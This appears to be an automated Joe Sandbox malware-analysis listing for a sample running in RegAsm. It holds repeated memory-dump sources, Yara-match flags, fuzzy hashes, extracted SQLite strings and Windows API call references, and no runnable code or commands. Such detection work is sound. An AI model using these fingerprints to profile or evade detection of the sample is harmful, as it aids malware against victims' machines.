                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                                                                                                                                                                                                        • API String ID: 0-131617836
                                                                                                                                                                                                                                        • Opcode ID: 4149d78d88c1096cbadb03de33a356b5b946f7ac7828653b98ec993578f5cfa7
                                                                                                                                                                                                                                        • Instruction ID: dacb6c2141bf62403e5cb1da0d318ec34681a55166c7a3ebfbd03c61f7eef598
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4149d78d88c1096cbadb03de33a356b5b946f7ac7828653b98ec993578f5cfa7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F051F576A041828BD3018F14E4C177AF7B2BB52724FCD41A8E8C64B7A5DB32ED868751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: main$rbu_memory
                                                                                                                                                                                                                                        • API String ID: 0-3973752345
                                                                                                                                                                                                                                        • Opcode ID: 76da0dd798032d48ba292e4bb9356b9467f509f92a48e22dcc53a804c7d439b1
                                                                                                                                                                                                                                        • Instruction ID: b501187e9b07cd15782e2b8e53faf8ae4e7685beda5aedc640b51663fc57735d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76da0dd798032d48ba292e4bb9356b9467f509f92a48e22dcc53a804c7d439b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D351D376A003419FD701DFA5E8C4B5AB3E8FB84316F188029EC89D7761DB35E945CB91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d2ad544cd8e2d13b67cec0c0d631855afa69b202b164db0b7f7df2351bb6bf9a
                                                                                                                                                                                                                                        • Instruction ID: 8f81cedfc6a3607bbe8e71f56b42eada8f3b6ddd42dfcf40347e59ea44f5b12c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2ad544cd8e2d13b67cec0c0d631855afa69b202b164db0b7f7df2351bb6bf9a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44515D71D102A0DBD7137BB4E9CCA6B37B8BF0078AB188024ED4A93671DB35E454DB66
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %!0.15g$JSON cannot hold BLOB values$null
                                                                                                                                                                                                                                        • API String ID: 0-3074873597
                                                                                                                                                                                                                                        • Opcode ID: 884105b442b255ab721275418368d280b2e37ea8a21c3937643698c35c099b1f
                                                                                                                                                                                                                                        • Instruction ID: aed40f492f8d626a11f69bd741d2a3466369dab0d5ab73da37f0157b3bcd047f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 884105b442b255ab721275418368d280b2e37ea8a21c3937643698c35c099b1f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA419DB6600B406FF3505B14FC82B9A77A4FBC3329F1C053AE1D1C25C2D76AA59883E1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 19C61E2C
                                                                                                                                                                                                                                        • no such database: %s, xrefs: 19C61E05
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                                                                                                                                                                                                                        • API String ID: 0-1404816483
                                                                                                                                                                                                                                        • Opcode ID: eefa0905c151c0c3ab08b7192c478c94ab4b578d24be8650855b4f01ccfac575
                                                                                                                                                                                                                                        • Instruction ID: c1fa4848d9df154e90ac4d13490b7949721dca90061830a1404a9953637b88fe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eefa0905c151c0c3ab08b7192c478c94ab4b578d24be8650855b4f01ccfac575
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 443147767043096BD3105F69EC40B5BB7E8FF81256F095169FD9897780EA76F90087B0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C79CF1
                                                                                                                                                                                                                                        • misuse, xrefs: 19C79CFB
                                                                                                                                                                                                                                        • API called with finalized prepared statement, xrefs: 19C79CE5
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C79D00
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-3620335220
                                                                                                                                                                                                                                        • Opcode ID: 59ad3d82d6d75e7f9f12db1d6bb8b13d5c20c6d85fe683846c8fd94e8e8e5f59
                                                                                                                                                                                                                                        • Instruction ID: 7c403d7862c0f33100d086947e6b3662ec93f18ffeaad5d3bda894f4ecc685f1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59ad3d82d6d75e7f9f12db1d6bb8b13d5c20c6d85fe683846c8fd94e8e8e5f59
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14113D7BF0076167FA119568FC45FCA63A89F9166AF0C4035F98596240EA20B84542F3
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(01461D58,?,00000104,00000000,?,00412525,?,01461D58,00000000), ref: 004118ED
                                                                                                                                                                                                                                        • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,01461D58,00000000,00000000,?,00412525,?,01461D58,00000000), ref: 0041190B
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?,?,00412525,?,01461D58,00000000,?,?,?,?,?,?,?,00000000), ref: 0041191E
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00411931
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                        • String ID: %%A$%s%s$C:\Users\user\Desktop\
                                                                                                                                                                                                                                        • API String ID: 1206339513-3967180970
                                                                                                                                                                                                                                        • Opcode ID: b3af0c830d7c66efbf35a3d675616cfa4270fd700d5d968e88c3d55ec8686320
                                                                                                                                                                                                                                        • Instruction ID: c5a9d92ede5ea4987b478224b8b0572e4dbdbd0cbd861403dae5f6f932e9b4ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3af0c830d7c66efbf35a3d675616cfa4270fd700d5d968e88c3d55ec8686320
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7EF0F0762402096FDB005F5CEC88DEBBBEEEF8A364B505116F9088B300CB359C82C6B0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1683cfc9ca1ecb5763dea7caf9e6c897c6944f876fdb0e11cca461729700cff5
                                                                                                                                                                                                                                        • Instruction ID: b4afe0da6d6bd4e27967af0e5b9ff18ccb742a3aefdde205a49e0d69cc418bab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1683cfc9ca1ecb5763dea7caf9e6c897c6944f876fdb0e11cca461729700cff5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F10772A04341AFDB45CF24E48075ABBE0BF843A4F18466DECD997381D735E94ACBA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 004120B0
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,00428340,?,?,?,00000000), ref: 004120FC
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,00428344,00000000,?,?,?,00000000), ref: 00412142
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,00428348,?,?,?,00000000), ref: 0041216E
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,0042834C,?,?,?,00000000), ref: 0041219A
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 004121CC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: strtok_s
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3330995566-0
                                                                                                                                                                                                                                        • Opcode ID: 8ab808e521ad988e47ca2df6490754f693fd19acd19366fb3acbd8f1064129c7
                                                                                                                                                                                                                                        • Instruction ID: e7a2fe36a0400bda3f7ffef75447838ffcf0b53659d9e15460f3b2746b801767
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ab808e521ad988e47ca2df6490754f693fd19acd19366fb3acbd8f1064129c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11419E74600205EFCB10DF58D944BE9B7B8FF15304FA0465EE605D3284DBB9A6B8CBA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 0041C2E5
                                                                                                                                                                                                                                          • Part of subcall function 0041ACC3: __mtinitlocknum.LIBCMT ref: 0041ACD9
                                                                                                                                                                                                                                          • Part of subcall function 0041ACC3: __amsg_exit.LIBCMT ref: 0041ACE5
                                                                                                                                                                                                                                          • Part of subcall function 0041ACC3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822,?,?,0041992B,00000000,0042E920,00419972,0040FCB0), ref: 0041ACED
                                                                                                                                                                                                                                        • DecodePointer.KERNEL32(0042E8A8,00000020,0041C428,00000000,00000001,00000000,?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D), ref: 0041C321
                                                                                                                                                                                                                                        • DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C332
                                                                                                                                                                                                                                          • Part of subcall function 0041B8AA: EncodePointer.KERNEL32(00000000,0041F47C,00642400,00000314,00000000,?,?,?,?,?,0041C63F,00642400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B8AC
                                                                                                                                                                                                                                        • DecodePointer.KERNEL32(-00000004,?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C358
                                                                                                                                                                                                                                        • DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C36B
                                                                                                                                                                                                                                        • DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C375
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2005412495-0
                                                                                                                                                                                                                                        • Opcode ID: bb10800c0d419d9d7c04633c4765f91ceac3c517b12544c32c546b9a078549f1
                                                                                                                                                                                                                                        • Instruction ID: e2b3956bf5e94b2baf730586d1c238e8b3fbb8ba7e12c12fc2e7ba7e24f6204d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb10800c0d419d9d7c04633c4765f91ceac3c517b12544c32c546b9a078549f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4531293094031ADFDF10AFA5DC846EDBBB2BF49314F64802BE524A6250DBBC58919F6D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getptd.LIBCMT ref: 0041B0BC
                                                                                                                                                                                                                                          • Part of subcall function 0041BA14: __getptd_noexit.LIBCMT ref: 0041BA17
                                                                                                                                                                                                                                          • Part of subcall function 0041BA14: __amsg_exit.LIBCMT ref: 0041BA24
                                                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 0041B0DC
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 0041B0EC
                                                                                                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 0041B109
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041B11C
                                                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(004301C0), ref: 0041B134
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
